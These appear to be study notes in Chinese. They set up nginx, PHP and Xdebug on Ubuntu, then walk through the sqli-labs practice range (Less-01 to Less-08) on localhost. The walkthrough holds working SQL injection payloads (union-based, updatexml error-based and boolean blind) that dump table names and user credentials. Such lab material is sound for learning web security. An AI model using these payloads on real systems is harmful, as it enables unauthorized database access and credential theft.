ubuntuan安装nginx以及php部署
1.安装依赖包
root@admin123-virtual-machine:~# apt-get install gcc libpcre3 libpcre3-dev zliblg zliblg-dev openssl libssl-dev
2.安装nginx
到https://nginx.org/en/download.html下载nginx
之后将压缩包通过xtfp传输到ubuntu的/usr/local/nginx目录下
root-virtual-machine:/usr/local/nginx# tar -vxf nginx-1.20.2 tar.gz
3.查看编译环境是否有缺失
root-virtual-machine:/usr/local/nginx/nginx-1.20.2# ./configure
4.编译
root-virtual-machine:/usr/local/nginx/nginx-1.20.2# make && make install
5.启动nginx
root-virtual-machine:/usr/local/nginx/sbin# ./nginx
6.访问nginx
7.增加php源地址
root-virtual-machine:~# sudo apt-get install software-properties-common
root-virtual-machine:~# sudo add-apt-repository -y ppa:ondrej/php
root-virtual-machine:~# sudo apt-get install php7.3
8.安装php
root-virtual-machine:~# sudo apt-get install php7.3-mysql php7.3-fpm php7.3-curl php7.3-xml php7.3-gd php7.3-mbstring php-memcached php7.3-zip
9.修改监听端口
root-virtual-machine:/etc/php/7.3/fpm/pool.d# vim www.conf
10.启动php-fpm,查看9000端口状况
root-virtual-machine:~# sudo service php7.3-fpm start
root-virtual-machine:~# netstat -lnt | grep 9000
11.测试
root-virtual-machine:/usr/local/nginx/html# vim web.php
Debug安装调试
1.VScode远程连接
2.安装PHP Debug
点击 Xdebug installation wizard 进入网站
将web.php的信息复制粘贴
(1)
root-virtual-machine:~# wget https://xdebug.org/files/xdebug-3.3.2.tgz
(2)
root-virtual-machine:~# apt-get install php7.3-dev autoconf automake
(3)
root-virtual-machine:~# tar -xvzf xdebug-3.3.2.tgz
(4)
root-virtual-machine:~# cd xdebug-3.3.2
(5)
root-virtual-machine:~# phpize
(6)
root-virtual-machine:~/xdebug-3.3.2# ./configure
(7)
root-virtual-machine:~/xdebug-3.3.2# make
(8)
root-virtual-machine:~/xdebug-3.3.2# cp modules/xdebug.so /usr/lib/php/20230831/
(9)
root-virtual-machine:~/xdebug-3.3.2# vim /etc/php/8.3/fpm/conf.d/99-xdebug.ini
(10)
root-virtual-machine:~/xdebug-3.3.2# service php7.3-fpm restart
sql注入 安装靶场
下载靶场解压到phpstudu_pro/WWW
更改数据库配置文件
登入靶场
Setup/reset Database for labs
Less01
sql注入流程
1.寻找注入点
http://localhost/sqliabs/Less-1/?id=1
2.判断是数字型还是字符型
字符型
3.判断闭合方式
http://localhost/sqliabs/Less-1/?id=1'
单引号闭合
4.验证输入的内容数据库是否执行,是否存在sql漏洞
若:
http://localhost/sqliabs/Less-1/?id=1’ and 1=1 --+
有显示
http://localhost/sqliabs/Less-1/?id=1' and 1=2 --+
无显示
则存在漏洞
5.判断列数
http://localhost/sqliabs/Less-1/?id=1' order by 10 --+
报错,说明没有10列
http://localhost/sqliabs/Less-1/?id=1' order by 3 --+
没有报错,说明有3列
6.联合查询,判断回显位
http://localhost/sqliabs/Less-1/?id=-1' union select 1,2,3 --+
2,3说明联合查询中的第2第3位的数据会显示到Your Login name和Your Password后
7.查数据库名
http://localhost/sqliabs/Less-1/?id=-1' union select 1,database(),3 --+
数据库名:security
8.查表名
http://localhost/sqliabs/Less-1/?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 --+
四张表:emails referers uagents users
9.查列名
http://localhost/sqliabs/Less-1/?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 --+
三个列名:id username password
10.查具体数据
http://localhost/sqliabs/Less-1/?id=-1' union select 1,(select group_concat(username)from users),(select group_concat(password)from users) --+
查出账号密码,成功通关。
Less-02~04通过方式与Less-01基本无异,只是闭合方式不同
Less-05
没有回显位,无法使用联合注入,可以使用报错注入
查数据库
http://localhost/sqliabs/Less-5/?id=-1' union select updatexml(1,concat('~',(select database()),'~'),1) --+
数据库名:security
查表名
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(table_name)from information_schema.tables where table_schema='security'),'~'),1),3 --+
四张表:emails referers uagents users
查列名
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),'~'),1),3 --+
三个列名:id username password
查账号密码
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(username)from users),'~'),1),3 --+
http://localhost/sqliabs/Less-5/?id=-1' union select 1,updatexml(1,concat('~',(select group_concat(password)from users),'~'),1),3 --+
成功通过。
Less-06~07和Less-05通过方式基本无异,只是闭合方式不同
Less-08
错误不显示
但是存在真假值,输入正确显示“You are in……”,输入错误无显示
http://localhost/sqliabs/Less-8/?id=1' and 1=1 --+
http://localhost/sqliabs/Less-8/?id=1' and 1=2 --+
使用布尔型盲注:
使用length()函数盲注数据库名长度
http://localhost/sqliabs/Less-8/?id=1' and length(database())>10 --+
无回显,错误,数据库名长度小于10
http://localhost/sqliabs/Less-8/?id=1' and length(database())=8 --+
有回显,正确,多次尝试确定数据库名长度为8
使用substr函数来判断数据库名的每一位分别是什么,通过变化ascii(substr(database(),x,1))中x的值我们可以确定每一位的具体值
http://localhost/sqliabs/Less-8/?id=1' and ascii(substr(database(),1,1))>70 --+
比较繁琐,不一一展示,最终确定数据库名为:’security‘
使用left函数,left((select table_name from information_schema.tables where table_schema=database() limit x,1),y)通过变换x和y的值我们可以得到所有的表名
http://localhost/sqliabs/Less-8/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+
同理判断列名:
http://localhost/sqliabs/Less-8/?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)='username' --+
同理判断具体用户和密码
http://localhost/sqliabs/Less-8/?id=1' and left((select username from users limit x,1),y)="" --+
过程过于繁琐,不一一展示了